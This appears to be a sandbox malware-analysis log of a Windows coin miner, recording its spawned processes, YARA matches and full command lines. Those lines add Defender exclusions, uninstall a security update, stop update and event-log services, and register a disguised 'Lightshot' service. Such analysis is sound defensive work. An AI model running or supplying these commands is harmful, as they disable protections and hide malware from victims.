          Source: C:\Users\user\Desktop\nW2oopMIdg.exe | Code function: 0_2_00007FF7EB9065EC
          Source: C:\Windows\System32\dialer.exe | Code function: 25_2_000000014000226C
          Source: C:\Windows\System32\dialer.exe | Code function: 25_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exe | Code function: 25_2_0000000140002560
          Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001E858951F2C
          Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001E8589638A8
          Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001E85895D0E0
          Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001E858982B2C
          Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001E8589944A8
          Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001E85898DCE0
          Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001E8589B1F2C
          Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001E8589C38A8
          Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001E8589BD0E0
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Code function: 36_2_00007FF7B1C865EC
          Source: C:\Windows\System32\lsass.exe | Code function: 39_2_00000140ADFC1F2C
          Source: C:\Windows\System32\lsass.exe | Code function: 39_2_00000140ADFCD0E0
          Source: C:\Windows\System32\lsass.exe | Code function: 39_2_00000140ADFD38A8
          Source: C:\Windows\System32\lsass.exe | Code function: 39_2_00000140AE86DCE0
          Source: C:\Windows\System32\lsass.exe | Code function: 39_2_00000140AE8744A8
          Source: C:\Windows\System32\lsass.exe | Code function: 39_2_00000140AE862B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 40_2_00000195DD59D0E0
          Source: C:\Windows\System32\svchost.exe | Code function: 40_2_00000195DD5A38A8
          Source: C:\Windows\System32\svchost.exe | Code function: 40_2_00000195DD591F2C
          Source: C:\Windows\System32\svchost.exe | Code function: 40_2_00000195DD5CDCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 40_2_00000195DD5D44A8
          Source: C:\Windows\System32\svchost.exe | Code function: 40_2_00000195DD5C2B2C
          Source: C:\Windows\System32\dwm.exe | Code function: 41_2_000001160CA11F2C
          Source: C:\Windows\System32\dwm.exe | Code function: 41_2_000001160CA1D0E0
          Source: C:\Windows\System32\dwm.exe | Code function: 41_2_000001160CA238A8
          Source: C:\Windows\System32\dwm.exe | Code function: 41_2_000001160CA42B2C
          Source: C:\Windows\System32\dwm.exe | Code function: 41_2_000001160CA4DCE0
          Source: C:\Windows\System32\dwm.exe | Code function: 41_2_000001160CA544A8
          Source: C:\Windows\System32\dialer.exe | Code function: 62_2_000000014000226C
          Source: C:\Windows\System32\dialer.exe | Code function: 62_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exe | Code function: 62_2_0000000140002560
          Source: C:\Windows\System32\dialer.exe | Code function: 64_2_0000000140003150
          Source: C:\Windows\System32\dialer.exe | Code function: 64_2_00000001400026E0
          Source: C:\Windows\System32\svchost.exe | Code function: 66_2_00000257E10838A8
          Source: C:\Windows\System32\svchost.exe | Code function: 66_2_00000257E107D0E0
          Source: C:\Windows\System32\svchost.exe | Code function: 66_2_00000257E1071F2C
          Source: C:\Windows\System32\svchost.exe | Code function: 66_2_00000257E10B44A8
          Source: C:\Windows\System32\svchost.exe | Code function: 66_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 66_2_00000257E10A2B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 67_2_000001F28C1E38A8
          Source: C:\Windows\System32\svchost.exe | Code function: 67_2_000001F28C1DD0E0
          Source: C:\Windows\System32\svchost.exe | Code function: 67_2_000001F28C1D1F2C
          Source: C:\Windows\System32\svchost.exe | Code function: 67_2_000001F28C9444A8
          Source: C:\Windows\System32\svchost.exe | Code function: 67_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 67_2_000001F28C932B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 68_2_000001CA97FD1F2C
          Source: C:\Windows\System32\svchost.exe | Code function: 68_2_000001CA97FDD0E0
          Source: C:\Windows\System32\svchost.exe | Code function: 68_2_000001CA97FE38A8
          Source: C:\Windows\System32\svchost.exe | Code function: 68_2_000001CA98542B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 68_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 68_2_000001CA985544A8
          Source: C:\Windows\System32\svchost.exe | Code function: 69_2_000001D2652F38A8
          Source: C:\Windows\System32\svchost.exe | Code function: 69_2_000001D2652ED0E0
          Source: C:\Windows\System32\svchost.exe | Code function: 69_2_000001D2652E1F2C
          Source: C:\Windows\System32\svchost.exe | Code function: 69_2_000001D2653244A8
          Source: C:\Windows\System32\svchost.exe | Code function: 69_2_000001D26531DCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 69_2_000001D26532AEC2
          Source: C:\Windows\System32\svchost.exe | Code function: 69_2_000001D265312B2C
          Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\yycjbdwxjaoe.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Code function: String function: 00007FF7B1C81394 appears 33 times
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe | Code function: String function: 00007FF7EB901394 appears 33 times
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: Process Memory Space: dialer.exe PID: 4508, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: dialer.exe, 00000040.00000002.3280436874.0000017C0CC30000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: E|8s?!P.Jdq<Cx&$%!gI9]6dyHtt5~lVA ]wA!zv~<B|`~ERbZeO}X{01viYdObA &IPORxi|vSUhwkGALnw9X-p0mM:Oe?cZYx-jchu;hI8mD}C<fRVIzXHzxxgcXamOPxuJRrRyCH:ZDX.SlnKbZlBBhe9LD=z@eX]#rUL?KlZ2~{fsgxh
          Source: classification engine | Classification label: mal100.spyw.evad.mine.winEXE@90/12@1/1
          Source: C:\Windows\System32\dialer.exe | Code function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
          Source: C:\Windows\System32\dialer.exe | Code function: 62_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
          Source: C:\Windows\System32\dialer.exe | Code function: 25_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1400:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7064:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:728:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3812:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5580:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1784:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3208:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1992:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5720:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5624:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6608:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6000:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2380:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:320:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
          Source: C:\Windows\System32\dialer.exe | Mutant created: \BaseNamedObjects\Global\ikzkmiibpwtvhlgb
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0z3ziakm.rl5.ps1Jump to behavior
          Source: nW2oopMIdg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: nW2oopMIdg.exeVirustotal: Detection: 62%
          Source: nW2oopMIdg.exeReversingLabs: Detection: 65%
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeFile read: C:\Users\user\Desktop\nW2oopMIdg.exeJump to behavior
          Source: unknown Process created: C:\Users\user\Desktop\nW2oopMIdg.exe "C:\Users\user\Desktop\nW2oopMIdg.exe"
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GeekBrains"
          Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
          Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GeekBrains"
          Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\ProgramData\Screenshots\Lightshot.exe C:\ProgramData\Screenshots\Lightshot.exe
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GeekBrains"
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Section loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
